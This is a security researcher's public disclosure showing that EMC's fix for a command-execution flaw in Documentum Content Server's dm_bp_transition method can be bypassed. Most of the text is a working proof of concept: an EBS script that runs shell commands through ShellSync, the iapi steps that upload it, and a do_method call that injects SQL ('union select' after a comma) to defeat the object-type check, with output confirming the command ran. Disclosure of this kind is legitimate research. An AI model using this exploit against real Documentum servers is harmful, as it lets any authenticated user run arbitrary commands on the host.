Product: EMC Documentum Content Server Vendor: EMC Version: ANY CVE: N/A Risk: High Status: public/not fixed On November 2013 I discovered vulnerability in EMC Documentum Content Server which allow authenticated user to execute arbitrary commands using dm_bp_transition docbase method (for detailed description see VRF#HUFPRMOP.txt). On July 2014 vendor announced ESA-2014-064 which was claiming that vulnerability has been remediated. On November 2014 fix was contested (there was significant delay after ESA-2014-064 because vendor constantly fails to provide status of reported vulnerabilities) by providing another proof of concept, description provided to CERT/CC (another CNA was chosen because vendor fails to communicate) was: =================================8<================================ I have tried to reproduce PoC, described in VRF#HUFPRMOP, and got following error: [ErrorCode] 1000 [Parameter] 0801fd08805c9dfe [ServerError] Unexpected error: [DM_API_W_NO_MATCH]warning: "There was no match in the docbase for the qualification: dm_procedure where r_object_id = '0801fd08805c9dfe'" Such behaviour means that EMC tried to remediate a security issue by “checking” object type of supplied object: Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle Session id is s0 API> id,c,dm_procedure where r_object_id = '0801fd08805c9dfe' ... [DM_API_W_NO_MATCH]warning: "There was no match in the docbase for the qualification: dm_procedure where r_object_id = '0801fd08805c9dfe'" API> Bye bin]$ strings dmbasic| grep dm_procedure id,%s,dm_procedure where object_name = '%s' and folder('%s') id,%s,dm_procedure where r_object_id = '%s' # old version of dmbasic binary bin]$ strings dmbasic| grep dm_procedure bin]$ So, the fix was implemented in dmbasic binary, the problem is neither 6.7 SP2 P15 nor 6.7 SP1 P28 patches contain dmbasic binary - the first patch that was shipped with dmbasic binary was 6.7SP2 P17. Moreover, the issue is still reproducible because introduced check could be bypassed using SQL injection: ~]$ cat test.ebs Public Function EntryCriteria(ByVal SessionId As String,_ ByVal ObjectId As String,_ ByVal UserName As String,_ ByVal TargetState As String,_ ByRef ErrorString As String) As Boolean t = ShellSync("echo dm_bp_transition_has_vulnerability > /tmp/test") EntryCriteria=True End Function ~]$ cat /tmp/test cat: /tmp/test: No such file or directory ~]$ iapi Please enter a docbase name (docubase): repo Please enter a user (dmadmin): test01 Please enter password for test01: EMC Documentum iapi - Interactive API interface (c) Copyright EMC Corp., 1992 - 2011 All rights reserved. Client Library Release 6.7.2190.0142 Connecting to Server using docbase repo [DM_SESSION_I_SESSION_START]info: "Session 0101fd088014000c started for user test01." Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle Session id is s0 API> create,c,dm_sysobject ... 0801fd08805c9dfe API> set,c,l,object_name SET> test ... OK API> setfile,c,l,test.ebs,crtext ... OK API> save,c,l ... OK API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS=' repo repo dmadmin "" 0000000000000000 0000000000000000 0000000000000000 "0801fd08805c9dfe,'' union select r_object_id from dm_sysobject where r_object_id=''0801fd08805c9dfe" 0000000000000000 0000000000000000 0000000000000000 "" 0 0 T F T T dmadmin 0000000000000000' ... (1 row affected) API> Bye ~]$ cat /tmp/test dm_bp_transition_has_vulnerability ~]$ Here ‘union …’ allows to bypass check based on "id" call: Connected to Documentum Server running Release 6.7.2190.0198 Linux.Oracle Session id is s0 API> id,c,dm_procedure where r_object_id='0801fd08805c9dfe,' union select r_object_id from dm_sysobject where r_object_id='0801fd08805c9dfe' ... 0801fd08805c9dfe API> apply,c,,GET_LAST_SQL ... q0 API> next,c,q0 ... OK API> get,c,q0,result ... select all dm_procedure.r_object_id from dm_procedure_sp dm_procedure where ((dm_procedure.r_object_id='0801fd08805c9dfe,')) and (dm_procedure.i_has_folder = 1 and dm_procedure.i_is_deleted = 0) union select all dm_sysobject.r_object_id from dm_sysobject_sp dm_sysobject where ((dm_sysobject.r_object_id= '0801fd08805c9dfe')) and (dm_sysobject.i_has_folder = 1 and dm_sysobject.i_is_deleted = 0) API> close,c,q0 ... OK Comma is required to bypass error in fetch call: API> fetch,c,0801fd08805c9dfe' union select r_object_id from dm_sysobject where r_object_id='0801fd08805c9dfe ... [DM_API_E_BADID]error: "Bad ID given: 0801fd08805c9dfe' union select r_object_id from dm_sysobject where r_object_id= '0801fd08805c9dfe" API> fetch,c,0801fd08805c9dfe,' union select r_object_id from dm_sysobject where r_object_id='0801fd08805c9dfe ... OK =================================>8================================ __ Regards, Andrey B. Panfilov